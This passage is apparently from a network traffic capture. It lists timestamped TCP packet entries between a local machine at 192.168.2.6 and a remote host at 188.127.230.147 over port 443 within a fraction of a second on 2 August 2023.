                                                          Aug 2, 2023 10:16:22.062551975 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.062585115 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.062707901 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.062707901 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.062707901 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.062747955 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.062810898 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.079878092 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.080005884 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.080019951 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.080065012 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.080065012 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.080110073 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.080632925 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.080691099 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.080724955 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.080748081 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.080782890 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.080818892 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.080969095 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.081027985 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.081039906 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.081053019 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.081078053 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.081089973 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.081980944 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.082057953 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.082087994 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.082103014 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.082123041 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.082164049 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.082268000 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.082317114 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.082355022 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.082370996 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.082392931 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.082412958 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.082573891 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.082623959 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.082644939 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.082660913 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.082681894 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.082712889 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.082720041 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.082735062 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.082761049 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.082784891 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.082837105 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.082848072 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.082865000 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.082932949 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.083319902 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.083414078 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.085920095 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.085937023 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.085997105 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.086215973 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.116708040 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.116775990 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.116911888 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.117036104 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.117067099 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.117121935 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.117208004 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137181044 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137218952 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137300014 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137315989 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137337923 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137341976 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137377024 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137382030 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137432098 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137448072 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137501955 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137593985 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137624025 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137644053 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137664080 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137680054 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137680054 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137710094 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137711048 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137727022 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137757063 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137763023 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137779951 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137789965 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137825012 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137836933 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137842894 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137861967 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137885094 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137900114 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137913942 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137922049 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137939930 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137964010 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.137967110 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.137984037 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.138012886 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.138022900 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.138051987 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.138062000 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.138077974 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.138103962 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.138217926 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.138289928 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.138318062 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.138376951 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.138377905 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.138422966 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.138468027 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.138636112 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.138663054 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.138706923 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.138721943 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.138736963 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.138758898 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.138765097 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.138777018 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.138813972 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.138858080 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.138858080 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.138875008 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.138890028 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.138894081 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.138923883 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.138931990 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.138947964 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.138962984 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.138973951 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.139012098 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.140041113 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.140070915 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.140211105 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.140238047 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.140275002 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.140310049 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.140316010 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.140316963 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.140335083 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.140348911 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.140369892 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.140384912 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.140619993 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.140646935 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.140702963 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.140714884 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.140729904 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.140754938 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.140791893 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.140887976 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.140918016 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.141011953 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.141051054 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.141072989 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.141072989 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.141072989 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.141072989 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.141072989 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.141072989 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.141093016 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.141119957 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.141140938 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.141609907 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.141645908 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.141673088 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.141704082 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.141796112 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.141823053 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.141905069 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.141937017 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.142009974 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.142838955 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.142838955 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.142838955 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.142838955 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.142839909 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.142839909 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.142839909 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.142839909 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.142870903 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.142904997 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.142904997 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.142971039 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.171566010 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.171613932 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.171710968 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.171739101 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.171766043 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.171771049 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.171814919 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.171833038 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.171840906 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.171880007 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.171969891 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.172003031 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.172029972 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.172040939 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.172069073 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.172193050 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.172235012 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.172259092 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.172266006 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.172305107 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.172460079 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.172496080 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.172549963 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.172557116 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.172581911 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.173598051 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.193993092 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.194045067 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.194149971 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.194178104 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.194212914 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.194266081 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.194293022 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.194314957 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.194350958 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.195465088 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.195508957 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.195611954 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.195628881 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.195746899 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.196403027 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.196440935 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.196495056 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.196506023 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.196544886 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.196583986 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.269741058 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.269773960 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.269938946 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.269964933 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.270026922 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.270591021 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.270622969 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.270687103 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.270693064 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.270706892 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.270734072 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.270756960 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.270803928 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.270812035 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.270828009 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.270874977 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.270881891 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.270916939 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.270917892 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.270930052 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.270951033 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.270957947 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.270973921 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.271011114 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.271023989 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.271034956 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.271053076 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.271078110 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.271125078 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.271132946 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.271173954 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.271256924 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.271600962 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.271627903 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.271702051 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.271709919 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.271760941 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.271833897 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.271857023 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.271908045 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.271917105 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.271933079 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.271966934 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.271970034 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272003889 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272011995 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272034883 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272044897 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272062063 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272070885 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272078991 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272119045 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272125959 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272155046 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272156954 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272167921 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272192955 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272227049 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272233009 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272244930 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272247076 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272257090 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272289991 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272319078 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272326946 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272335052 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272356033 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272368908 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272397995 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272403002 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272418022 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272439957 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272444010 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272453070 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272485018 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272516012 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272541046 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272542000 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272555113 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.272564888 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.272593975 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.273108959 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.273132086 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.273180962 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.273188114 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.273231030 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.273257017 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.273281097 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.273298025 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.273329973 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.273351908 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.273360968 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.273392916 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.273422003 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.273451090 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.273453951 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.273475885 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.273521900 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.273530006 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.273569107 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.273595095 CEST49707443192.168.2.6188.127.230.147
